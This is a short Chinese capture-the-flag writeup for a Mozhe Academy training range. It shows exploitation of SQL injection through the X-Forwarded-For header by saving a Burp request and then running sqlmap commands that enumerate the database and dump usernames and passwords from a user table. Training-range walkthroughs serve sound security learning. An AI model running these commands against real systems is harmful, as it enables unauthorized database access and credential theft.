墨者学院 – X-Forwarded-For注入漏洞实战Writeup

枫少@KillBoy SQL注入评论浏览量:40,864次1阅读模式

1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示

墨者学院 – X-Forwarded-For注入漏洞实战Writeup

2.爆出当前的数据库

sqlmap -r 1.txt --current-db --batch

3.爆表名

sqlmap -r 1.txt -D webcalendar -T user --columns --batch

4.爆表中的字段

sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

5.得到帐号密码

墨者学院 – X-Forwarded-For注入漏洞实战Writeup

6.登陆获得KEY

墨者学院 – X-Forwarded-For注入漏洞实战Writeup

高性能云服务器2折起
枫少@KillBoy
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: